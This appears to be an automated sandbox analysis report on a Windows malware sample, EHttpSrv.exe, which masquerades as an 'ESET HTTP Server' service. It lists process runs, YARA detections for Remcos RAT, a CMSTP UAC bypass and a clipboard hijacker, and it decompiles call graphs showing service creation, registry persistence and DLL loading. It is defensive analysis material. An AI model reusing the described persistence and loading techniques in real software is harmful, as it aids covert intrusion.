                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:27
                                                                                                              Start time:19:26:00
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WerFault.exe"
                                                                                                              Imagebase:0x70000
                                                                                                              File size:483'680 bytes
                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_MicroClip, Description: Yara detected MicroClip, Source: 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false

                                                                                                              Target ID:29
                                                                                                              Start time:19:26:07
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\EHttpSrv.exe"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              Target ID:30
                                                                                                              Start time:19:26:07
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Imagebase:0x1c0000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.3107816901.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                              Has exited:true

                                                                                                              Target ID:31
                                                                                                              Start time:19:26:07
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff66e660000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:19:26:25
                                                                                                              Start date:29/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\EHttpSrv.exe
                                                                                                              Imagebase:0x400000
                                                                                                              File size:20'680 bytes
                                                                                                              MD5 hash:9329BA45C8B97485926A171E34C2ABB8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.3108383923.0000000000472000.00000008.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.3108485798.000000000047B000.00000004.00000001.01000000.00000000.sdmp, Author: unknown
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:0.9%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:16.8%
                                                                                                                Total number of Nodes:167
                                                                                                                Total number of Limit Nodes:6
                                                                                                                execution_graph 19944 20478e6a 19945 20478e76 19944->19945 19946 20478e71 19944->19946 19950 20478d54 19945->19950 19967 20479254 19946->19967 19949 20478e87 19952 20478d60 __onexit 19950->19952 19951 20478d87 ___DllMainCRTStartup __onexit 19951->19949 19952->19951 19953 20478dc6 19952->19953 19955 20478db3 19952->19955 19971 20478891 19953->19971 19975 20478b91 19955->19975 19957 20478dbb 19957->19951 19957->19953 19959 20478dfa 19959->19951 19961 20478deb 19959->19961 19960 20478dda 19962 20478891 ___DllMainCRTStartup 3 API calls 19960->19962 19961->19959 19963 20478b91 ___DllMainCRTStartup 16 API calls 19961->19963 19964 20478de2 19962->19964 19966 20478e0b 19963->19966 19965 20478b91 ___DllMainCRTStartup 16 API calls 19964->19965 19965->19961 19966->19951 19968 20479277 19967->19968 19969 20479284 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19967->19969 19968->19969 19970 2047927b 19968->19970 19969->19970 19970->19945 19972 2047889d 19971->19972 19973 204788bb 19971->19973 19972->19973 19974 204788a3 #1079 #1087 #1162 19972->19974 19973->19959 19973->19960 19974->19973 19976 20478b9c 19975->19976 19977 20478bc4 19976->19977 19978 20478c98 19976->19978 19980 20478bde ___DllMainCRTStartup 19976->19980 19979 20478bf4 InterlockedCompareExchange 19977->19979 19981 20478bfd 19977->19981 19983 20478be9 Sleep 19977->19983 19978->19980 19982 20478cb8 InterlockedCompareExchange 19978->19982 19979->19977 19979->19981 19980->19957 19986 20478c13 _amsg_exit 19981->19986 19987 20478c1c _initterm_e 19981->19987 19984 20478cc2 19982->19984 19985 20478cad Sleep 19982->19985 19983->19979 19988 20478cd6 _decode_pointer 19984->19988 19989 20478ccc _amsg_exit 19984->19989 19985->19982 19990 20478c58 19986->19990 19987->19980 19991 20478c42 _initterm 19987->19991 19992 20478d37 InterlockedExchange 19988->19992 19993 20478ceb _decode_pointer 19988->19993 19989->19980 19990->19980 19994 20478c5f InterlockedExchange 19990->19994 19991->19990 19992->19980 19995 20478cf8 19993->19995 19994->19980 19996 20478d1f free _encoded_null 19995->19996 19997 20478cfd _encoded_null 19995->19997 19996->19992 19997->19995 19998 20478d0f _decode_pointer 19997->19998 19998->19995 19922 20404570 19926 20403f41 19922->19926 19923 20403f12 GlobalAlloc 19923->19926 19924 20404177 CreateFileW 19924->19926 19925 204041b0 GlobalAlloc ReadFile CloseHandle 19925->19926 19926->19923 19926->19924 19926->19925 19927 204043b5 19926->19927 19930 20404317 GlobalAlloc 19926->19930 19928 20404485 LoadLibraryW 19927->19928 19929 2040449d 19928->19929 19930->19926 19999 401cce 20019 40216c 19999->20019 20001 401cda GetStartupInfoW 20002 401d0b InterlockedCompareExchange 20001->20002 20003 401d1c 20002->20003 20004 401d18 20002->20004 20006 401d47 20003->20006 20007 401d3d _amsg_exit 20003->20007 20004->20003 20005 401d24 Sleep 20004->20005 20005->20002 20008 401d70 20006->20008 20009 401d50 _initterm_e 20006->20009 20007->20008 20010 401d9a 20008->20010 20011 401d7f _initterm 20008->20011 20009->20008 20013 401d6b __onexit 20009->20013 20012 401d9f InterlockedExchange 20010->20012 20015 401da7 20010->20015 20011->20010 20012->20015 20015->20013 20016 401e77 20015->20016 20017 401e2b exit 20015->20017 20020 401000 20015->20020 20016->20013 20018 401e7f _cexit 20016->20018 20017->20015 20018->20013 20019->20001 20039 4017c0 20020->20039 20022 401010 GetCommandLineW wcsstr 20023 401039 GetCommandLineW wcsstr 20022->20023 20024 40102d 20022->20024 20026 401056 LoadLibraryW 20023->20026 20027 40104a 20023->20027 20049 401580 GetModuleFileNameW OpenSCManagerW 20024->20049 20030 401068 GetProcAddress GetProcAddress GetCommandLineW wcsstr 20026->20030 20031 4010bb 20026->20031 20060 4016e0 OpenSCManagerW 20027->20060 20028 401032 20028->20015 20032 40109b 20030->20032 20033 4010af 20030->20033 20031->20015 20065 401420 20032->20065 20078 401550 StartServiceCtrlDispatcherW 20033->20078 20037 4010a0 FreeLibrary 20037->20015 20038 4010b4 FreeLibrary 20038->20031 20040 4017d0 20039->20040 20040->20040 20041 4017f4 wcscpy_s 20040->20041 20042 40180a wcsncpy_s 20040->20042 20043 40182c 20041->20043 20042->20043 20044 401860 wcsncpy_s 20043->20044 20045 40184a wcscpy_s 20043->20045 20046 401882 20044->20046 20045->20046 20047 4018a6 wcscpy_s 20046->20047 20048 4018bd wcsncpy_s 20046->20048 20047->20022 20048->20022 20050 4016c1 20049->20050 20051 4015d3 CreateServiceW 20049->20051 20050->20028 20052 4016bd CloseServiceHandle 20051->20052 20053 40160f CloseServiceHandle 20051->20053 20052->20050 20079 4018f0 vswprintf_s 20053->20079 20055 401625 RegOpenKeyExW 20055->20052 20056 40164f RegSetValueExW RegCreateKeyExW 20055->20056 20058 4016b3 RegCloseKey 20056->20058 20059 4016b6 RegCloseKey 20056->20059 20058->20059 20059->20052 20061 40104f 20060->20061 20062 4016f6 OpenServiceW 20060->20062 20061->20015 20063 401715 DeleteService CloseServiceHandle 20062->20063 20064 40171f CloseServiceHandle 20062->20064 20063->20064 20064->20061 20080 4010e0 RegisterClassExW 20065->20080 20067 40143a 20083 401730 20067->20083 20069 401448 20070 40144c GetModuleFileNameW 20069->20070 20077 4014b8 20069->20077 20075 401465 20070->20075 20071 401512 20072 401527 DestroyWindow 20071->20072 20073 40152e 20071->20073 20072->20073 20073->20037 20075->20075 20092 401910 20075->20092 20076 4014e0 Sleep 20076->20077 20077->20071 20077->20076 20078->20038 20079->20055 20081 401142 CreateWindowExW 20080->20081 20082 40113b 20080->20082 20081->20067 20082->20067 20097 4018f0 vswprintf_s 20083->20097 20085 40175b 20098 4019a0 20085->20098 20087 401776 20088 40179e 20087->20088 20109 401b00 RegQueryValueExW 20087->20109 20088->20069 20090 401787 RegCloseKey 20090->20088 20093 401915 20092->20093 20093->20093 20094 401994 20093->20094 20095 401956 wcscat_s 20093->20095 20096 40196d wcsncpy_s 20093->20096 20094->20077 20095->20077 20096->20094 20097->20085 20099 4019dc 20098->20099 20100 4019f0 RegOpenKeyExW 20099->20100 20101 401a06 RegCreateKeyExW 20099->20101 20102 401a21 20100->20102 20101->20102 20103 401a28 20101->20103 20102->20087 20104 401a46 wcscpy_s 20103->20104 20105 401a5c wcsncpy_s 20103->20105 20106 401a7f wcsrchr 20104->20106 20105->20106 20106->20102 20107 401a93 20106->20107 20107->20102 20108 401ab0 RegCloseKey RegCreateKeyExW 20107->20108 20108->20102 20110 401b33 20109->20110 20111 401b2c 20109->20111 20110->20111 20112 401b4b RegQueryValueExW 20110->20112 20111->20090 20112->20090 19931 204044d0 VirtualProtect 19942 20404626 19931->19942 19934 20403f12 GlobalAlloc 19935 20403f41 19934->19935 19935->19934 19936 20404177 CreateFileW 19935->19936 19937 204041b0 GlobalAlloc ReadFile CloseHandle 19935->19937 19938 204043b5 19935->19938 19941 20404317 GlobalAlloc 19935->19941 19936->19935 19937->19935 19939 20404485 LoadLibraryW 19938->19939 19940 2040449d 19939->19940 19941->19935 19943 204044e7 VirtualProtect 19942->19943 19943->19935

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 00401803
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 00401859
                                                                                                                  • Part of subcall function 004017C0: wcscpy_s.MSVCR80 ref: 004018B5
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00401016
                                                                                                                • wcsstr.MSVCR80 ref: 00401024
                                                                                                                • GetCommandLineW.KERNEL32 ref: 00401039
                                                                                                                • wcsstr.MSVCR80 ref: 00401041
                                                                                                                  • Part of subcall function 00401580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76231D70), ref: 004015B6
                                                                                                                  • Part of subcall function 00401580: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 004015C3
                                                                                                                  • Part of subcall function 00401580: CreateServiceW.ADVAPI32(00000000,EHttpSrv,ESET HTTP Server,000F01FF,00000010,00000003,00000001,?,00000000,00000000,00000000,?,00000000,6FB10C0A), ref: 004015FB
                                                                                                                  • Part of subcall function 00401580: CloseServiceHandle.ADVAPI32(00000000), ref: 00401610
                                                                                                                  • Part of subcall function 00401580: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,0002001F,?), ref: 00401645
                                                                                                                  • Part of subcall function 00401580: RegSetValueExW.ADVAPI32(?,Description,00000000,00000001,ESET HTTP Server,?), ref: 0040167C
                                                                                                                  • Part of subcall function 00401580: RegCreateKeyExW.ADVAPI32(?,Parameters,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0040169F
                                                                                                                  • Part of subcall function 00401580: RegCloseKey.ADVAPI32(?), ref: 004016B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2333072497.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2333057818.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2333105556.0000000000404000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2333123258.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s$CloseCommandCreateLineOpenServicewcsstr$FileHandleManagerModuleNameValue
                                                                                                                • String ID: -app$StartHttpServer$StopHttpServer$http_dll.dll
                                                                                                                • API String ID: 2068747329-304233262
                                                                                                                • Opcode ID: bfff211ea4cdc9cc23a97f7a1dfe9e4cd21386795f217708e710b657fbf56fc9
                                                                                                                • Instruction ID: e3be212c131674410c1c2ebee6bc56352eccad3693de89cbbe7196e95990011f
                                                                                                                • Opcode Fuzzy Hash: bfff211ea4cdc9cc23a97f7a1dfe9e4cd21386795f217708e710b657fbf56fc9
                                                                                                                • Instruction Fuzzy Hash: 02119E326022046BC700BFF66D4AE4B7B8C9A857627144837FD00F61E1EABDE614957D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 19 20404160-20404164 20 20404156-2040415b 19->20 21 20404166-20404196 CreateFileW 19->21 20->19 24 2040451c-20404526 21->24 25 2040419c-204041aa 21->25 26 20404529-2040452d 24->26 31 204041b0-204041d5 GlobalAlloc ReadFile CloseHandle 25->31 32 204043ac-204043b0 25->32 26->24 27 2040452f-20404535 26->27 29 20404551-20404556 27->29 30 20404537-2040453c 27->30 34 20403f12-20403f43 GlobalAlloc 29->34 35 2040455c 29->35 33 20404546-2040454f 30->33 31->24 36 204041db-2040420a call 20404626 * 2 31->36 32->24 33->29 33->33 34->24 41 20403f49-20403f65 call 204045c6 34->41 35->24 36->24 46 20404210-20404231 36->46 47 20403f67 41->47 48 20403f6d-20403f86 41->48 49 20404233-2040426d 46->49 47->48 50 204043b5-20404404 call 204045c6 48->50 51 20403f8c-20403fb5 48->51 52 2040427f-20404283 49->52 71 20404411-2040442c 50->71 72 20404406-2040440f 50->72 51->20 54 20404285-20404288 52->54 55 2040428a-2040428e 52->55 54->55 56 20404276-20404279 54->56 57 20404290-20404293 55->57 58 20404295-20404299 55->58 56->52 59 20404527 56->59 57->56 57->58 61 204042a0-204042a8 58->61 62 2040429b-2040429e 58->62 59->26 64 204042b1-204042b8 61->64 65 204042aa-204042af 61->65 62->56 62->61 66 204042c0-204042c8 64->66 67 204042ba-204042be 64->67 65->56 65->64 69 204042d1-204042d9 66->69 70 204042ca-204042cf 66->70 67->56 67->66 73 204042e2-204042ea 69->73 74 204042db-204042e0 69->74 70->56 70->69 75 20404436-2040443e 71->75 72->71 72->72 76 204042f3-20404311 73->76 77 204042ec-204042f1 73->77 74->56 74->73 75->75 78 20404440 75->78 80 20404313-20404315 76->80 81 2040434d-2040434f 76->81 77->56 77->76 79 20404446-2040444e 78->79 79->79 82 20404450-20404465 call 204045f6 79->82 80->81 83 20404317-2040434b GlobalAlloc call 20404626 80->83 84 20404351-20404360 81->84 85 20404384-20404386 81->85 99 20404485-204044cc LoadLibraryW call 20404626 82->99 100 20404467-20404469 82->100 86 20404388-204043a1 83->86 88 20404366-20404382 call 20404626 84->88 89 2040455e-20404575 call 20404626 84->89 85->86 86->49 92 204043a7 86->92 88->86 89->27 92->26 101 20404476-20404483 100->101 101->99 101->101
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 20404190
                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000001), ref: 204041B6
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 204041C5
                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 204041CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AllocCloseCreateGlobalHandleRead
                                                                                                                • String ID: ?$?$?$?$?
                                                                                                                • API String ID: 388571530-3425934482
                                                                                                                • Opcode ID: 67d4ce6f76d59dcfc2f5265d94f6543ac42eb0e7de045181e51dacb0bff6f7ca
                                                                                                                • Instruction ID: 1d9fecc048d5ebdea5e256a55a120de2506068c49cdc505e27952ee320c8127c
                                                                                                                • Opcode Fuzzy Hash: 67d4ce6f76d59dcfc2f5265d94f6543ac42eb0e7de045181e51dacb0bff6f7ca
                                                                                                                • Instruction Fuzzy Hash: 62A1AFB0608341ABD719CFA4C484B5ABBE2AFC5744F44CA7CF994A7342D778DA04CB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 105 204044d0-20404519 VirtualProtect call 20404626 VirtualProtect 109 2040451c-20404526 105->109 110 20404529-2040452d 109->110 110->109 111 2040452f-20404535 110->111 112 20404551-20404556 111->112 113 20404537-2040453c 111->113 115 20403f12-20403f43 GlobalAlloc 112->115 116 2040455c 112->116 114 20404546-2040454f 113->114 114->112 114->114 115->109 118 20403f49-20403f65 call 204045c6 115->118 116->109 121 20403f67 118->121 122 20403f6d-20403f86 118->122 121->122 123 204043b5-20404404 call 204045c6 122->123 124 20403f8c-20403fb5 122->124 135 20404411-2040442c 123->135 136 20404406-2040440f 123->136 125 20404156-20404164 124->125 128 20404166-20404196 CreateFileW 125->128 128->109 134 2040419c-204041aa 128->134 141 204041b0-204041d5 GlobalAlloc ReadFile CloseHandle 134->141 142 204043ac-204043b0 134->142 137 20404436-2040443e 135->137 136->135 136->136 137->137 139 20404440 137->139 140 20404446-2040444e 139->140 140->140 143 20404450-20404465 call 204045f6 140->143 141->109 144 204041db-2040420a call 20404626 * 2 141->144 142->109 154 20404485-20404497 LoadLibraryW 143->154 155 20404467-20404469 143->155 144->109 153 20404210-20404231 144->153 156 20404233-2040426d 153->156 159 2040449d-204044cc call 20404626 154->159 157 20404476-20404483 155->157 158 2040427f-20404283 156->158 157->154 157->157 160 20404285-20404288 158->160 161 2040428a-2040428e 158->161 160->161 163 20404276-20404279 160->163 164 20404290-20404293 161->164 165 20404295-20404299 161->165 163->158 167 20404527 163->167 164->163 164->165 168 204042a0-204042a8 165->168 169 2040429b-2040429e 165->169 167->110 170 204042b1-204042b8 168->170 171 204042aa-204042af 168->171 169->163 169->168 172 204042c0-204042c8 170->172 173 204042ba-204042be 170->173 171->163 171->170 174 204042d1-204042d9 172->174 175 204042ca-204042cf 172->175 173->163 173->172 176 204042e2-204042ea 174->176 177 204042db-204042e0 174->177 175->163 175->174 178 204042f3-20404311 176->178 179 204042ec-204042f1 176->179 177->163 177->176 180 20404313-20404315 178->180 181 2040434d-2040434f 178->181 179->163 179->178 180->181 182 20404317-20404339 GlobalAlloc call 20404626 180->182 183 20404351-20404360 181->183 184 20404384-20404386 181->184 191 2040433e-2040434b 182->191 187 20404366-20404382 call 20404626 183->187 188 2040455e-20404575 call 20404626 183->188 185 20404388-204043a1 184->185 185->156 190 204043a7 185->190 187->185 188->111 190->110 191->185
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,00000000), ref: 204044D9
                                                                                                                • VirtualProtect.KERNELBASE(?,00000000,?,?), ref: 204044F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: b0b461f4361be4dee5a55f635670ca515baf644bca3db06e136deeb1515ee1e8
                                                                                                                • Instruction ID: 830f1ece4cab85104a5116d0d9e9e41a1ea74eebd5cf8276e133c103f1593903
                                                                                                                • Opcode Fuzzy Hash: b0b461f4361be4dee5a55f635670ca515baf644bca3db06e136deeb1515ee1e8
                                                                                                                • Instruction Fuzzy Hash: B4F01DB2508344AFD7019B88DD4186FFBE9FF88704F40482EF59482120E776D9248B92

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 195 20404010 196 20404012-2040401b 195->196 197 20404046-2040404c 195->197 200 20404026-20404032 196->200 198 20404052-20404061 197->198 199 204043bf-204043dc 197->199 202 20403fb6-20403fe8 call 204045c6 * 2 198->202 203 20404067-20404077 198->203 204 204043e0-20404404 call 204045c6 199->204 200->200 201 20404034-20404038 200->201 201->198 205 2040403a 201->205 217 20404001-2040400e call 204045f6 202->217 218 20403fea 202->218 203->204 215 20404411-2040442c 204->215 216 20404406-2040440f 204->216 205->199 219 20404436-2040443e 215->219 216->215 216->216 217->195 220 20403ff6-20403fff 218->220 219->219 222 20404440 219->222 220->217 220->220 223 20404446-2040444e 222->223 223->223 225 20404450-20404465 call 204045f6 223->225 229 20404485-204044cc LoadLibraryW call 20404626 225->229 230 20404467-20404469 225->230 231 20404476-20404483 230->231 231->229 231->231
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 5951aa6c9f8a438f153127fcd9a9f3ee10ee28293eb90f2eab6fdb5f8755e8f9
                                                                                                                • Instruction ID: c18f9c85a66ec3f790252471dd21006197b5acf5d9a27bf5ee6111b8c4cc0023
                                                                                                                • Opcode Fuzzy Hash: 5951aa6c9f8a438f153127fcd9a9f3ee10ee28293eb90f2eab6fdb5f8755e8f9
                                                                                                                • Instruction Fuzzy Hash: 874181B02043019FD718DF64C491B2AB7E6FFC8314F41893DEA8AA7391E778A905CB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 235 20404060-20404404 call 204045c6 241 20404411-2040442c 235->241 242 20404406-2040440f 235->242 243 20404436-2040443e 241->243 242->241 242->242 243->243 244 20404440 243->244 245 20404446-2040444e 244->245 245->245 246 20404450-20404465 call 204045f6 245->246 250 20404485-204044cc LoadLibraryW call 20404626 246->250 251 20404467-20404469 246->251 252 20404476-20404483 251->252 252->250 252->252
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 20404486
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: ad88f8b07a3075c5fb51b8329be8ff086f78926237761a80a17b9aee6eef6861
                                                                                                                • Instruction ID: 0ee044101d6d02e9337f6b7c62f6bf65ce1bd520952ddccff6895c4f292aa369
                                                                                                                • Opcode Fuzzy Hash: ad88f8b07a3075c5fb51b8329be8ff086f78926237761a80a17b9aee6eef6861
                                                                                                                • Instruction Fuzzy Hash: E52137B01083019FD314CF24C885B2AB7F6BFC8324F45866CE689A7392E778A901CB52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
